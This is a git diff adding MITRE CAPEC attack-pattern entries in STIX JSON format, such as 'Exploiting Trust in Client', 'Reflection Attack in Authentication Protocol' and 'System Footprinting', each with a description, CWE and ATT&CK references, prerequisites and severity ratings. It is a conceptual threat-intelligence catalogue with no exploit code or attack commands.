+ ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json new file mode 100644 index 0000000000000000000000000000000000000000..03dca00e5d088c3fd21dee3b02176b673cb2e762 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json 
@@ -0,0 +1,105 @@ +{ + "id": "bundle--747dc324-2f22-498f-af32-d716ececdc49", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. 
Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." 
+ ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7.json new file mode 100644 index 0000000000000000000000000000000000000000..1a368fa3ab3c50d730195976c78d19f456b47b59 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7.json 
@@ -0,0 +1,98 @@ +{ + "id": "bundle--ae842da6-fe09-4202-8c9e-5b0da8f2a804", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.\n ", + "external_references": [ + { + "external_id": "CAPEC-691", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/691.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + } + ], + "id": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Open-Source Software Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1", + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_child_of_refs": [ + "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain 
Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data." + ], + "x_capec_extended_description": "\n Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. Examples of metadata that may be spoofed include:\n \n Owner of the software (e.g., repository or package owner)\n Author(s) of repository commits\n Frequency of repository commits\n Date/Time of repository commits\n Package or Repository \"stars\"\n \n Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf" + ], + "x_capec_prerequisites": [ + "Identification of a popular open-source component whose metadata is to be spoofed." 
+ ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of software metadata to convince victims the source is trusted." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json new file mode 100644 index 0000000000000000000000000000000000000000..8df66917efa3782774a65991a4d8c1ef2e335da3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json 
@@ -0,0 +1,48 @@ +{ + "id": "bundle--7c333043-32d4-42ac-adf5-9aa4c3cfc4b1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.", + "external_references": [ + { + "external_id": "CAPEC-181", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + } + ], + "id": "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Flash File Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.", + "The victim's browser must support invisible Flash overlays." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the Flash overlay over the decoy content." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json new file mode 100644 index 0000000000000000000000000000000000000000..151d4345c10d7bca08e1af9352de4411c45a02d6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json 
@@ -0,0 +1,64 @@ +{ + "id": "bundle--b1d42bc9-3bcf-485e-9776-01ff863d2d9e", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an 
adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json new file mode 100644 index 0000000000000000000000000000000000000000..3d293ec2f67adec4bde031440b632ab32e90ca25 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json 
@@ -0,0 +1,47 @@ +{ + "id": "bundle--995791b0-d4a7-4d6e-bdc1-05794c4378b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-272", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/272.html" + } + ], + "id": "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b", + "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81", + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "The protocol or implementations thereof must contain bugs that an adversary can exploit." + ], + "x_capec_resources_required": [ + "In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json new file mode 100644 index 0000000000000000000000000000000000000000..e7cdae0933c35b3e9daceecbe00c77f73a988b28 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--c8dc799b-f843-41d4-a0c7-bb57c43dce45", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json new file mode 100644 index 0000000000000000000000000000000000000000..9317e41a845080ce0516c43e315147d1dd24a1b5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json 
@@ -0,0 +1,73 @@ +{ + "id": "bundle--bd976170-dff2-4b6e-8a26-4733b5f23cc1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.\n ", + "external_references": [ + { + "external_id": "CAPEC-191", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/191.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "description": "Unsecured Credentials:Credentials in files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-51", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Decompiler" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-52", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Debugger" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-53", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Disassembler" + } + ], + "id": "attack-pattern--2231936f-0dda-4736-a089-9e734231907c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Read Sensitive Constants Within an Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + 
"attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security" + ], + "x_capec_extended_description": "\n One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.\n Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.\n ", + "x_capec_prerequisites": [ + "Access to a binary or executable such that it can be analyzed by various utilities." + ], + "x_capec_resources_required": [ + "Binary analysis programs such as 'strings' or 'grep', or hex editors." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json new file mode 100644 index 0000000000000000000000000000000000000000..2db24c3d5179be76feb0b20cd5f45c96d6e04115 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json 
@@ -0,0 +1,76 @@ +{ + "id": "bundle--7a7d8b5d-4cb9-4b8b-8079-143f88ac2cb1", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution 
for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json new file mode 100644 index 0000000000000000000000000000000000000000..482bd98eda15d321a8cd272720f91f32f564b2c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json 
@@ -0,0 +1,73 @@ +{ + "id": "bundle--6ebec20a-c19d-4560-9dc4-3e46d2bafe39", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." 
+ ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json new file mode 100644 index 0000000000000000000000000000000000000000..ac361da87a473fd3f38cb3a7ec4b0c195fdf72ac --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json 
